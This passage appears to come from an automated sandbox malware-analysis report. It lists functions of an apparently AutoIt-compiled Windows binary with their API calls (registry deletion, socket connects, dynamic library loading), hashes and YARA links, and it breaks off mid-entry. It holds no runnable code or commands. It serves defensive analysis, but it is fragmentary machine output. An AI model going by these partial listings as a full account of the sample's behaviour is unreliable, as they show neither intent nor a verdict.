                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: d282e538b189f607b71c04e0401f01d28fd20c0163b8960d3f896126d687b388
                                                  • Instruction ID: 6301bb82eb8e9fdd01dea3d00216d77f9c789715fcc54fafaa8763e78bd870f4
                                                  • Opcode Fuzzy Hash: d282e538b189f607b71c04e0401f01d28fd20c0163b8960d3f896126d687b388
                                                  • Instruction Fuzzy Hash: 3041AF75508384AAC756EF64C841ADF77E8EF89380F00086EB89AC3251EA34D3CDD75A
                                                  Function 00C77291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C772AA
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C77351
                                                  • IsMenu.USER32(?), ref: 00C77369
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C773B1
                                                  • DrawMenuBar.USER32 ref: 00C773C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: e816720fd94bc5d2c42fd1dbae92c51ac05ccc3f06fc8ae9b626c292ab4a443f
                                                  • Instruction ID: 50607f4b2a19349c29baf0e790d18e607706ba85fcf2cb48509f312879870e1b
                                                  • Opcode Fuzzy Hash: e816720fd94bc5d2c42fd1dbae92c51ac05ccc3f06fc8ae9b626c292ab4a443f
                                                  • Instruction Fuzzy Hash: 39411875A44208EFDB20DF50D884A9EBBF4FB04314F148629FD19972A0D731AE50EF50
                                                  Function 00C70FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C70FD4
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C70FFE
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00C710B5
                                                    • Part of subcall function 00C70FA5: RegCloseKey.ADVAPI32(?), ref: 00C7101B
                                                    • Part of subcall function 00C70FA5: FreeLibrary.KERNEL32(?), ref: 00C7106D
                                                    • Part of subcall function 00C70FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C71090
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C71058
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 5c04f9e6d28e86856c38a7bcb89304a2ede5dd26b0f965a0d16a7a628da1079f
                                                  • Instruction ID: 3d04d0bdf628da95f62d72387ab742a710a265a6ac3d88551358e8e7f5c53e43
                                                  • Opcode Fuzzy Hash: 5c04f9e6d28e86856c38a7bcb89304a2ede5dd26b0f965a0d16a7a628da1079f
                                                  • Instruction Fuzzy Hash: 09311EB1901109BFDB25DF94DC89EFFB7BCEF08340F14416AE91AA2241D6745F859BA0
                                                  Function 00C762CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C762EC
                                                  • GetWindowLongW.USER32(015652E0,000000F0), ref: 00C7631F
                                                  • GetWindowLongW.USER32(015652E0,000000F0), ref: 00C76354
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C76386
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C763B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C763C1
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C763DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: 85da53be3d19defe8b1aaba6b89d4fa9b79c7a44be79ec56c4362b7da5db3163
                                                  • Instruction ID: f5127d236d75d659dd81e968e26bc2410d5efb8786a6aa84fd67fefe6e9e964f
                                                  • Opcode Fuzzy Hash: 85da53be3d19defe8b1aaba6b89d4fa9b79c7a44be79ec56c4362b7da5db3163
                                                  • Instruction Fuzzy Hash: A1311330640A50AFDB21DF19DC84F5937E1FB4A714F1982A8F5298F2B2CB72AD80DB51
                                                  Function 00C4DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DB2E
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DB54
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C4DB57
                                                  • SysAllocString.OLEAUT32(?), ref: 00C4DB75
                                                  • SysFreeString.OLEAUT32(?), ref: 00C4DB7E
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C4DBA3
                                                  • SysAllocString.OLEAUT32(?), ref: 00C4DBB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 614b7e7342ec40381d683293e8d47c626d7d87f88af8f90a151c1270bc5bb595
                                                  • Instruction ID: 83f84c829610d87f10bbaeab0a4570d3638c289051640cc90f3f33aa24038962
                                                  • Opcode Fuzzy Hash: 614b7e7342ec40381d683293e8d47c626d7d87f88af8f90a151c1270bc5bb595
                                                  • Instruction Fuzzy Hash: C521B232600219AFDF10EFB9DC88DBF77ACFB09360B018529F919DB251D6709D818B60
                                                  Function 00C66173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C67D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C67DB6
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C661C6
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C661D5
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C6620E
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00C66217
                                                  • WSAGetLastError.WSOCK32 ref: 00C66221
                                                  • closesocket.WSOCK32(00000000), ref: 00C6624A
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C66263
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: bd027e0c55247190d0de0ad7792331da6a249470653be570f9acade9c19ecea0
                                                  • Instruction ID: 840f1e1f09b468b316c448cb5332de7dced0110c198aa5714eb962604f93d71a
                                                  • Opcode Fuzzy Hash: bd027e0c55247190d0de0ad7792331da6a249470653be570f9acade9c19ecea0
                                                  • Instruction Fuzzy Hash: C3319E71600108ABDF20AF24CCC5BBE7BA8EB45764F044069F919A7291CB70AD459AA2
                                                  Function 00C4F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 1038674560-2734436370
                                                  • Opcode ID: 5afd36a216553f262b171387a6d02648140d7a5a5e75e6c3bea5d48decc993e9
                                                  • Instruction ID: 53e2494970a57a47ec8ea813edb00f0a8abe297e37f37e15764893c59482bc20
                                                  • Opcode Fuzzy Hash: 5afd36a216553f262b171387a6d02648140d7a5a5e75e6c3bea5d48decc993e9
                                                  • Instruction Fuzzy Hash: 182146722051156AD230AA35AC02EF773E8FF56344F11403DF99687091EBA49E83E3A5
                                                  Function 00C4DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DC09
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DC2F
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C4DC32
                                                  • SysAllocString.OLEAUT32 ref: 00C4DC53
                                                  • SysFreeString.OLEAUT32 ref: 00C4DC5C
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C4DC76
                                                  • SysAllocString.OLEAUT32(?), ref: 00C4DC84
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 00b5f52b90416f4b55932ebea2d40b9e11e8ff0eb28f543ec88ee95117bce14c
                                                  • Instruction ID: 5db23d0aa7056df005ef36a8de42de80799d345bf7be45e360e312d0f9c1d961
                                                  • Opcode Fuzzy Hash: 00b5f52b90416f4b55932ebea2d40b9e11e8ff0eb28f543ec88ee95117bce14c
                                                  • Instruction Fuzzy Hash: 8E215635604205AF9B10EFB9DCC8EAB77ECFB09360B108125F915CB261D6B0DD85DB64
                                                  Function 00C775CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF1D73
                                                    • Part of subcall function 00BF1D35: GetStockObject.GDI32(00000011), ref: 00BF1D87
                                                    • Part of subcall function 00BF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF1D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C77632
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C7763F
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C7764A
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C77659
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C77665
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: a8e9872acc07479d4f36a5b6ebf69af77cdc80f378f7b7c2af181b98d20b11db
                                                  • Instruction ID: ea65fbb91138448d5564c7711edce546f9adbcfc9f65611c2dc140244d8d8504
                                                  • Opcode Fuzzy Hash: a8e9872acc07479d4f36a5b6ebf69af77cdc80f378f7b7c2af181b98d20b11db
                                                  • Instruction Fuzzy Hash: 3C1186B115011DBFEF159F65CC85EEB7F6DEF08798F114215B608A6050CA729C21DBA4
                                                  Function 00C19AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 00C19AE6
                                                    • Part of subcall function 00C13187: EncodePointer.KERNEL32(00000000), ref: 00C1318A
                                                    • Part of subcall function 00C13187: __initp_misc_winsig.LIBCMT ref: 00C131A5
                                                    • Part of subcall function 00C13187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C19EA0
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C19EB4
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C19EC7
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C19EDA
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C19EED
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C19F00
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C19F13
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C19F26
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C19F39
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C19F4C
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C19F5F
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C19F72
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C19F85
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C19F98
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C19FAB
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C19FBE
                                                  • __mtinitlocks.LIBCMT ref: 00C19AEB
                                                  • __mtterm.LIBCMT ref: 00C19AF4
                                                    • Part of subcall function 00C19B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C19AF9,00C17CD0,00CAA0B8,00000014), ref: 00C19C56
                                                    • Part of subcall function 00C19B5C: _free.LIBCMT ref: 00C19C5D
                                                    • Part of subcall function 00C19B5C: DeleteCriticalSection.KERNEL32(00CAEC00,?,?,00C19AF9,00C17CD0,00CAA0B8,00000014), ref: 00C19C7F
                                                  • __calloc_crt.LIBCMT ref: 00C19B19
                                                  • __initptd.LIBCMT ref: 00C19B3B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C19B42
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3567560977-0
                                                  • Opcode ID: 28b911c1cbc18f6575458d1686d40c2314e50692784e0af711c6060d518b8640
                                                  • Instruction ID: 24953da7a6d0aacd5627c7eaaccbbe58a38e45eb9bed39ed95271ebf23f7c0dd
                                                  • Opcode Fuzzy Hash: 28b911c1cbc18f6575458d1686d40c2314e50692784e0af711c6060d518b8640
                                                  • Instruction Fuzzy Hash: FEF06D32A0D711AAE6347775BC237CE2690DF03734F204A29F464861D2EE3086C171A0
                                                  Function 00C1406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C13F85), ref: 00C14085
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C1408C
                                                  • EncodePointer.KERNEL32(00000000), ref: 00C14097
                                                  • DecodePointer.KERNEL32(00C13F85), ref: 00C140B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 699167c2abbe27e29a604cad208a63b6e3e53fecfea5d2b44ea92e0d8d2c6999
                                                  • Instruction ID: c07a2fb60f0145a478ca25a2ec0b7767df09cd32388f67f5f6b9ba399b4e16ee
                                                  • Opcode Fuzzy Hash: 699167c2abbe27e29a604cad208a63b6e3e53fecfea5d2b44ea92e0d8d2c6999
                                                  • Instruction Fuzzy Hash: F7E0B674585350EFEB20AF75EC4DB4D3AA8BB04746F104129F115E11F0CBB64681DB14
                                                  Function 00C564B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: 0b60bd368bc712a7ea268781fc090c68f80eefd966a978ec10e3bac08ccfbdc0
                                                  • Instruction ID: 99d8a910743ee92079aabf8bc7cf900464d8003893a0cbc6ab12de85210c571a
                                                  • Opcode Fuzzy Hash: 0b60bd368bc712a7ea268781fc090c68f80eefd966a978ec10e3bac08ccfbdc0
                                                  • Instruction Fuzzy Hash: 7C619A3450024A9BCF01EF60CC82EFE3BA5AF05308F444598FD55AB292DB74A999EB54
                                                  Function 00C701E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C70E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C702BD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C702FD
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C70320
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C70349
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7038C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C70399
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: 77547a0cd9b83b4f57d0c689b8e5f2114edeba74aff918edf7538f401d8475d5
                                                  • Instruction ID: 621be77a5971130b237b00b043077114dda78850f2f8b3aab9f0c284cc9e055e
                                                  • Opcode Fuzzy Hash: 77547a0cd9b83b4f57d0c689b8e5f2114edeba74aff918edf7538f401d8475d5
                                                  • Instruction Fuzzy Hash: A2515931108204EFC714EF64C885E6EBBE8FF85314F14895DF5998B2A2DB31E949DB52
                                                  Function 00C75799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00C757FB
                                                  • GetMenuItemCount.USER32(00000000), ref: 00C75832
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C7585A
                                                  • GetMenuItemID.USER32(?,?), ref: 00C758C9
                                                  • GetSubMenu.USER32(?,?), ref: 00C758D7
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C75928
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: ea317867c5eff2efa4bdb978e7d77fdc5f4a7f730339e7f33da0f61b96dc7ad4
                                                  • Instruction ID: 3fc709e8edb8de98c365387d247526c3161dcec5fc51f75d94eb76af116d2343
